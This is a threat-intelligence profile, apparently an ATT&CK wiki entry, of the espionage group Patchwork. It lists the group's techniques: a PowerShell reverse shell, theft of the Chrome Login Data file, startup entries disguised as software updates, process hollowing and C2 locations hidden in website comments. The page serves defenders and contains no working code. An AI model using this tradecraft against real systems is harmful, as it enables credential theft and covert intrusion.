Group: Patchwork, Dropping Elephant, Chinastrats

From enterprise
Jump to: navigation, search
Patchwork, Dropping Elephant, Chinastrats
Group
ID G0040
Aliases Patchwork, Dropping Elephant, Chinastrats

Patchwork is a threat group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Much of the code used by this group was copied and pasted from online forums.12

Techniques Used

  • PowerShell - Patchwork used PowerSploit to download and run a reverse shell.1
  • System Information Discovery - Patchwork collected the victim computer name, OS version, and architecture type and sent the information to its C2 server .1
  • System Owner/User Discovery - Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server.1
  • Credential Dumping - Patchwork dumped the login data database from \AppData\Local\Google\Chrome\User Data\Default\Login Data.1
  • Security Software Discovery - Patchwork scanned the “Program Files” directories for a directory with the string “Total Security” (the installation path of the “360 Total Security” antivirus tool).1
  • Masquerading - Patchwork installed its payload in the startup programs folder as "Baidu Software Update." The group also adds its second stage payload to the startup programs as “Net Monitor."1
  • File and Directory Discovery - A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions.1
  • Process Hollowing - A Patchwork payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe.1
  • Remote File Copy - A Patchwork payload downloads additional malware from the C2 server.3
  • Web Service - Patchwork hides base64-encoded and encrypted C2 server locations in comments on legitimate websites.3